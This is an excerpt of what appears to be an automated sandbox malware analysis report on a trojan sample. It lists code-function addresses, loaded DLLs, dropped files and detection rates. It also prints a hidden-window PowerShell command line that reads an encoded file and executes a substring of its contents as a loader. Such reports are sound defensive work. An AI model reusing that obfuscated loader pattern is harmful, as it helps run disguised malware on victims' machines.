Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2121A118	11_2_2121A118
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21208158	11_2_21208158
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_212341A2	11_2_212341A2
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_212401AA	11_2_212401AA
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_212381CC	11_2_212381CC
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21212000	11_2_21212000
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2123A352	11_2_2123A352
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_212403E6	11_2_212403E6
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2118E3F0	11_2_2118E3F0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21220274	11_2_21220274
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_212002C0	11_2_212002C0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21180535	11_2_21180535
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21240591	11_2_21240591
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21224420	11_2_21224420
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21232446	11_2_21232446
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2122E4F6	11_2_2122E4F6
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211A4750	11_2_211A4750
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21180770	11_2_21180770
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117C7C0	11_2_2117C7C0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2119C6E0	11_2_2119C6E0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21196962	11_2_21196962
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2124A9A6	11_2_2124A9A6
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211829A0	11_2_211829A0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2118A840	11_2_2118A840
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21182840	11_2_21182840
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211668B8	11_2_211668B8
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AE8F0	11_2_211AE8F0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2123AB40	11_2_2123AB40
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21236BD7	11_2_21236BD7
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117EA80	11_2_2117EA80
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2118AD00	11_2_2118AD00
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2121CD1F	11_2_2121CD1F
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21198DBF	11_2_21198DBF
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117ADE0	11_2_2117ADE0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21180C00	11_2_21180C00
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21220CB5	11_2_21220CB5
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21170CF2	11_2_21170CF2
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21222F30	11_2_21222F30
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211A0F30	11_2_211A0F30
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211C2F28	11_2_211C2F28
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F4F40	11_2_211F4F40
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211FEFA0	11_2_211FEFA0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21172FC8	11_2_21172FC8
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2118CFE0	11_2_2118CFE0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2123EE26	11_2_2123EE26
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21180E59	11_2_21180E59
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21192E90	11_2_21192E90
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2123CE93	11_2_2123CE93
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2123EEDB	11_2_2123EEDB
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2124B16B	11_2_2124B16B
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2116F172	11_2_2116F172
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211B516C	11_2_211B516C
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2118B1B0	11_2_2118B1B0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2123F0E0	11_2_2123F0E0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_212370E9	11_2_212370E9
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211870C0	11_2_211870C0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2122F0CC	11_2_2122F0CC
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2123132D	11_2_2123132D
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2116D34C	11_2_2116D34C
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211C739A	11_2_211C739A
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211852A0	11_2_211852A0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_212212ED	11_2_212212ED
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2119B2C0	11_2_2119B2C0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21237571	11_2_21237571
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2121D5B0	11_2_2121D5B0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_212495C3	11_2_212495C3
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2123F43F	11_2_2123F43F
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21171460	11_2_21171460
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2123F7B0	11_2_2123F7B0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211C5630	11_2_211C5630
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_212316CC	11_2_212316CC
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21215910	11_2_21215910
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21189950	11_2_21189950
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2119B950	11_2_2119B950
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211ED800	11_2_211ED800
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211838E0	11_2_211838E0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2123FB76	11_2_2123FB76
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211BDBF9	11_2_211BDBF9
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F5BF0	11_2_211F5BF0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21237A46	11_2_21237A46
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2123FA49	11_2_2123FA49
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F3A6C	11_2_211F3A6C
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21221AA3	11_2_21221AA3
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2121DAAC	11_2_2121DAAC
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211C5AA0	11_2_211C5AA0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2122DAC6	11_2_2122DAC6
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21183D40	11_2_21183D40
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21231D5A	11_2_21231D5A
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2123FCF2	11_2_2123FCF2
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2123FF09	11_2_2123FF09
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21181F92	11_2_21181F92
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2123FFB1	11_2_2123FFB1
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21143FD5	11_2_21143FD5
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21143FD2	11_2_21143FD2
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21189EB0	11_2_21189EB0

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\nsjDF7A.tmp\nsExec.dll 01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B

Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: String function: 2116B970 appears 272 times
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: String function: 211B5130 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: String function: 211C7E54 appears 110 times
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: String function: 211FF290 appears 104 times
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: String function: 211EEA12 appears 86 times

Source: iwEnYIOol8.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@6/13@2/2

Source: C:\Users\user\Desktop\iwEnYIOol8.exe

0_2_00403532

Source: C:\Users\user\Desktop\iwEnYIOol8.exe

Code function: 0_2_004049C7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004049C7

Source: C:\Users\user\Desktop\iwEnYIOol8.exe

Code function: 0_2_004021AF CoCreateInstance,

0_2_004021AF

Source: C:\Users\user\Desktop\iwEnYIOol8.exe

File created: C:\Users\user\AppData\Roaming\erstatningsgraden

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6492:120:WilError_03

Source: C:\Users\user\Desktop\iwEnYIOol8.exe

File created: C:\Users\user~1\AppData\Local\Temp\nsdDEBD.tmp

Jump to behavior

Source: iwEnYIOol8.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\iwEnYIOol8.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\iwEnYIOol8.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: iwEnYIOol8.exe	ReversingLabs: Detection: 55%
Source: iwEnYIOol8.exe	Virustotal: Detection: 70%

Source: C:\Users\user\Desktop\iwEnYIOol8.exe

File read: C:\Users\user\Desktop\iwEnYIOol8.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\iwEnYIOol8.exe "C:\Users\user\Desktop\iwEnYIOol8.exe"
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Flerpartisystemernes=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\hobbyprget.Lic';$Medregnendes=$Flerpartisystemernes.SubString(72468,3);.$Medregnendes($Flerpartisystemernes) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe "C:\Users\user~1\AppData\Local\Temp\Bldtvandsfiltrene166.exe"
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Flerpartisystemernes=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\hobbyprget.Lic';$Medregnendes=$Flerpartisystemernes.SubString(72468,3);.$Medregnendes($Flerpartisystemernes) "	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe "C:\Users\user~1\AppData\Local\Temp\Bldtvandsfiltrene166.exe"	Jump to behavior

Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\iwEnYIOol8.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Users\user\Desktop\iwEnYIOol8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: iwEnYIOol8.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: qm.Core.pdb source: powershell.exe, 00000002.00000002.1915591946.0000000008B37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdb source: Bldtvandsfiltrene166.exe, 0000000B.00000001.1894149943.0000000000649000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: wntdll.pdbUGP source: Bldtvandsfiltrene166.exe, 0000000B.00000003.2187907391.0000000020DEC000.00000004.00000020.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000002.2276959569.0000000021140000.00000040.00001000.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000002.2276959569.00000000212DE000.00000040.00001000.00020000.00000000.sdmp, Bldtvandsfiltrene166.exe, 0000000B.00000003.2190343375.0000000020F99000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: indows\System.Core.pdbP source: powershell.exe, 00000002.00000002.1915591946.0000000008B37000.00000004.00000020.00020000.00000000.sdmp
